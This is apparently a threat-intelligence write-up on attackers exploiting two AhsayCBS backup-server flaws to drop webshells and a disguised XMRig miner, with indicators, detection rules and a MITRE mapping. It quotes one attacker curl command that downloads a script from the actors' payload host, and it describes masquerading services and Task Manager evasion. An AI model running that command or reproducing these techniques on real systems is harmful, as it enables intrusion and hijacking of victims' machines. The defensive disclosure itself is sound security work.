Threat Actors Exploit Critical AhsayCBS Flaws to Drop Webshells and XMRig Cryptominer

Key Takeaways

  • On October 4, 2026, NVD disclosed two CVEs impacting the AhsayCBS backup utility: CVE-2026-105133 and CVE-2026-105134. Starting October 7 (23:20:15 UTC), Huntress began seeing threat actors exploiting the flaws to perform remote code execution on impacted hosts. 

  • As of October 8, Huntress has seen five organizations targeted via these flaws. Post-exploitation, threat actors are conducting reconnaissance, dropping webshells, planting XMRig cryptominers masquerading as Microsoft Edge, and more. They also dropped what appears to be an AI-assisted PowerShell script that monitors the Windows Task Manager and shuts it down if it remains open for too long in the middle of the night.

  • AhsayCBS versions up to 10.3.2 are impacted. Version 10.3.4 is unaffected by this issue; impacted organizations should update to this version.

Acknowledgements: Special thanks to Dipo Rodipe, John Hammond, Susannah Matt, Ben Nahorney, and Lindsey Welch for their contributions to this investigation and writeup. 

Background

Huntress is observing threat actors targeting vulnerabilities in AhsayCBS (Cloud Backup Server), the management console for Ahsay's backup software (developed by Ahsay systems). AhsayCBS is primarily used by managed service providers (MSPs) and system integrators; it centralizes control of backup operations, letting administrators create and manage users, configure backup policies, and more. 

 On October 4, two vulnerabilities were identified in AhsayCBS versions up to 10.3.2:

  • CVE-2026-105133: A medium-severity flaw affecting the checkSysPwd function of the file com/ahsay/obs/api/ApiStructsAction.java, which can lead to improper authentication.

  • CVE-2026-105134: A critical-severity vulnerability affecting /rps/api/json/UpdateReceivers.do of the component Replication Receiver in AhsayCBS, which can be exploited to achieve unauthenticated remote code execution as NT AUTHORITY/SYSTEM on the host. The API contains an authentication bypass that could allow for a random token to substitute valid credentials. After exploitation, a threat actor configured a malicious receiver and dropped a Java Server Page (JSP) webshell into the application directory served by the CBS application. 

Huntress is seeing these two vulnerabilities being chained together in order to gain access to targeted systems. First, CVE-2026-105133 is used to bypass authentication. Then CVE-2026-105134 is used to gain code execution.

The NVD records for both flaws also said that an exploit had been published, and upgrading to version 10.3.4 mitigates the issue. Version 10.3.4 was released August 5, 2026, according to Ahsay's documentation.

Starting 2026-10-07 23:20:15 UTC, Huntress observed threat actors exploiting the vulnerabilities to gain unauthenticated remote code execution and deploy webshells on exposed systems. Initially, we picked up on several suspicious command lines spawning from AhsayCBS executable files (cbssvcX64.exe).

Figures 1 and 2: Suspicious child processes spawning from cbssvcX64.exe

Below, we're outlining the post-exploitation behavior observed and our analysis of the vulnerabilities in an effort to help defenders get ahead of this threat.

Post-exploitation activity 

In some incidents we saw threat actors deploy .jsp webshells in the web application directory immediately after exploitation. Across several other incidents, we observed cbssvcX64.exe spawn a series of commands to drop several files in either the %TEMP% or ../AppData/Local/Temp folder from hxxp://imagefiles-backup.oss-ap-southeast-7.aliyuncs[.]com. These included Taskgmr.ps1, msedge.exe, edge.exe, and config.json.

Cryptominers

We also saw threat actors launch cryptomining operations via XMRig, a legitimate open-source Monero miner that attackers frequently install on compromised systems to covertly consume CPU resources and generate cryptocurrency for themselves.

On several endpoints we observed the XMRig miner (edge.exe), renamed to masquerade as a Microsoft Edge process, being dropped in Temp folders, followed by miner network connections being established on port 8029 to an XMR pool (51.195.127[.]124:8029, xmr.kryptex[.]network).

The actors executed PowerShell to modify config.json in the Temp folder, before creating a Windows service (MicrosoftEdgeUpdateSvc) that is designed to look similar to the actual Microsoft Edge Update service (edgeupdate). This service helped the attackers establish persistence on the endpoint, and was configured to run msedge.exe (one of the files downloaded earlier via the curl command from cbssvcX64.exe) from the Temp folder with SYSTEM privileges. 

Figure 3: VirusTotal results for msedge.exe

Further investigation showed msedge.exe is a modified copy of the legitimate NSSM utility. NSSM can support other programs to ensure they stay running and restart after a crash or reboot, and threat actors in this incident likely used it to maintain persistence for edge.exe, while disguising the service-related binary as a legitimate-looking file.  

PS1 Script/Task Manager

Taskgmr.ps1  appears to be an AI-assisted script (given the commented code) that supports cryptomining operations after being launched via curl: 

curl -sk -o "C:\Users\ADMINI~1\AppData\Local\Temp\Taskgmr.ps1" "http://imagefiles-backup.oss-ap-southeast-7.aliyuncs[.]com/javas/Office/win/Taskgmr.ps1" --max-time 60

This script has several built-in anti-analysis functionalities. For instance, it checks continuously for the Task Manager. If Task Manager is opened it stops MicrosoftEdgeUpdateSvc to hide the cryptomining activity. When the Task Manager is closed, it restarts it again.

The script also kills Task Manager at a specific time (18:00) and if it was left open for more than one hour during overnight hours. The script used the endpoint's local Get-Date time as opposed to UTC. 

Vulnerable Kernel Driver

In one of the incidents, Huntress observed threat actors using Windows' built-in certutil.exe to download a file to the TEMP folder (C:\Users\REDACTED\AppData\Local\Temp\WinRing0x64.sys) from hxxp://imagefiles-backup.oss-ap-southeast-7.aliyuncs[.]com.

WinRing0x64.sys is a known legitimate but vulnerable kernel driver that's part of the WinRing0 library (from OpenLibSys) and that provides low-level access to system hardware. Vulnerable drivers are often brought into attacks to disable endpoint security tools, but this case appeared to serve a different purpose.

By loading this driver, the attackers enabled the miner to operate with kernel-level access to the underlying hardware, supporting the cryptomining operation outlined above with the broadest possible control and performance. This capability has been previously publicly reported in other unrelated attacks. 

Mitigation guidance for impacted organizations  

AhsayCBS version 10.3.4 is not impacted by these vulnerabilities; organizations that use the backup utility should ensure they are running this version and upgrade immediately if they are not. 

Organizations should also restrict AhsayCBS management interface web access, as the exploit targets the externally accessible web app service on the host. Access should be limited to trusted IP addresses only or require VPN. If any of the IoCs listed in this blog have been uncovered, companies should carry out a full host re-image from a trusted backup; as attackers have been able to hide secondary backdoors for extended persistence. 

Huntress is currently working with potentially impacted organizations across our customer base to apply these mitigations; we recommend that all Ahsay customers adhere to these mitigations.

Sigma Rules

We've published four Sigma rules for this activity in the Huntress threat-intel repository (2026/2026-10/AhsayCBS_XMRig_Miner). They are post-exploitation detections written specifically for this campaign, and each targets a step the actor relies on to deploy, hide, or run the cryptominer, so alerting on any one of them gives defenders a chance to interrupt the chain. They follow the intrusion in the order described above.

  • Unexpected Child Process from AhsayCBS Service flags any process spawned by cbssvcX64.exe or cbssvcX86.exe outside the service's normal startup and maintenance commands. Because AhsayCBS runs its web app inside the service process, commands from an uploaded JSP webshell appear as direct children of the service.

  • Fake Edge Binary Launched with Daemonized Flag flags Edge-named binaries that carry the msedge_exe original file name or run with --daemonized. Here, a renamed NSSM and the XMRig miner posed as Microsoft Edge.

  • PowerShell Scriptblock - Task Manager Aware Service Control flags a script block that checks for Task Manager and stops or starts a service to match, which is how Taskgmr.ps1 hides the miner from users. It matches that pairing rather than the service name, so renaming the service won't evade it.

  • WinRing0 Driver Downloaded via Command Line flags a command line that names WinRing0 alongside a URL. Miner droppers fetch the vulnerable driver this way, while legitimate hardware-monitoring tools ship it inside their installers.

Indicators of Compromise (IOCs)

Item

Description

  • 177.4.12[.]11
    (AS140227 HKCICL-AS-AP Hong Kong)

  • 38.60.252[.]110
    (AS154177 LIGHT4-AS-AP Vietnam)

  • 107.191.47[.]199
    (AS20473 AS-VULTR France)

  • 185.220.236[.]49
    (AS38136 AKARI-NETWORKS-AS-AP  Taiwan)

  • 104.234.26[.]10
    (AS134677 IDC-AS-AP United States)

  • 123.202.208[.]37 (AS9269 HKBN-AS-AP Hong Kong)

Network Infrastructure

  • hxxp://imagefiles-backup.oss-ap-southeast-7.aliyuncs[.]com/javas/Office/win/Taskgmr.ps1

  • hxxp://imagefiles-backup.oss-ap-southeast-7.aliyuncs[.]com/javas/Office/win/edge.exe

  • hxxp://imagefiles-backup.oss-ap-southeast-7.aliyuncs[.]com/javas/Office/win/msedge.exe

  • hxxp://imagefiles-backup.oss-ap-southeast-7.aliyuncs[.]com/javas/Office/win/config.json

  • hxxp://imagefiles-backup.oss-ap-southeast-7.aliyuncs[.]com/javas/Office/win/WinRing0x64.sys

Payload Hosting (Alibaba Cloud Object Storage)

  • Mining Pool URL: "xmr.kryptex[.]network:8029"

  • Mining Pool User: "krxYMRN97D/creativejs"

Crypto Pool & Unique Identifier

Msedge.exe

SHA256:

05f69ae6b2b89c1c4dcf836bff032232f11bf0109f2b498e2345045d06139034

Modified NSSM utility

Edge.exe

SHA256:

4dcb0202fe8b2d4d7b183764e38184cd6ed50132786cc7e7d1f7f4bce1dd6f3d

Miner

Taskgmr.ps1

SHA256:

481728a7c9c4c02be07051d9c1958d902ea6397ebb8952ab83944818e3d25d21

Powershell script

MITRE ATT&CK Mapping 

Tactic

Technique ID

Technique Name

Description

Resource Development

T1608.001

Stage Capabilities: Upload Malware

Staged Taskgmr.ps1, edge.exe, msedge.exe, config.json and WinRing0x64.sys on Alibaba Cloud Object Storage (imagefiles-backup.oss-ap-southeast-7.aliyuncs[.]com)

Initial Access

T1190

Exploit Public-Facing Application

Chained CVE-2026-105133 (authentication bypass) and CVE-2026-105134 (RCE through /rps/api/json/UpdateReceivers.do) against internet-exposed AhsayCBS

Execution

T1059.001

Command and Scripting Interpreter: PowerShell

Ran Taskgmr.ps1; used PowerShell to modify config.json in the Temp folder

T1059.003

Command and Scripting Interpreter: Windows Command Shell

cbssvcX64.exe spawned commands that ran curl and certutil to download payloads

T1569.002

System Services: Service Execution

Ran msedge.exe (modified NSSM) as SYSTEM through the MicrosoftEdgeUpdateSvc service

Persistence

T1505.003

Server Software Component: Web Shell

Configured a malicious replication receiver and dropped a JSP webshell into the directory the CBS application serves

T1543.003

Create or Modify System Process: Windows Service

Created the MicrosoftEdgeUpdateSvc service, which uses NSSM to keep the edge.exe miner running and restart it after a crash or reboot

Privilege Escalation

T1543.003

Create or Modify System Process: Windows Service

Configured the service to run with SYSTEM privileges

Defense Evasion

T1036.004

Masquerading: Masquerade Task or Service

Named the service MicrosoftEdgeUpdateSvc to look like the legitimate Edge Update service (edgeupdate)

T1036.005

Masquerading: Match Legitimate Resource Name or Location

Renamed the NSSM utility to msedge.exe and the XMR miner to edge.exe

T1564

Hide Artifacts

Taskgmr.ps1 stopped the mining service while Task Manager was open, restarted it once Task Manager closed, and killed Task Manager at 18:00 or if it stayed open for more than an hour overnight

Discovery

T1057

Process Discovery

Taskgmr.ps1 continuously checked whether Task Manager was running

T1124

System Time Discovery

Taskgmr.ps1 used Get-Date (local host time) to decide when to kill Task Manager

Command and Control

T1105

Ingress Tool Transfer

Downloaded payloads to %TEMP% with curl and certutil.exe, including the vulnerable WinRing0x64.sys driver

T1071.001

Application Layer Protocol: Web Protocols

Retrieved payloads over HTTP from Alibaba Cloud OSS

T1571

Non-Standard Port

Miner connected to the XMR pool on port 8029 (xmr.kryptex[.]network, 51.195.127[.]124)

Impact

T1496.001

Resource Hijacking: Compute Hijacking

Deployed an XMR miner (edge.exe) and loaded the WinRing0x64.sys driver to give the miner kernel-level hardware access

You might also like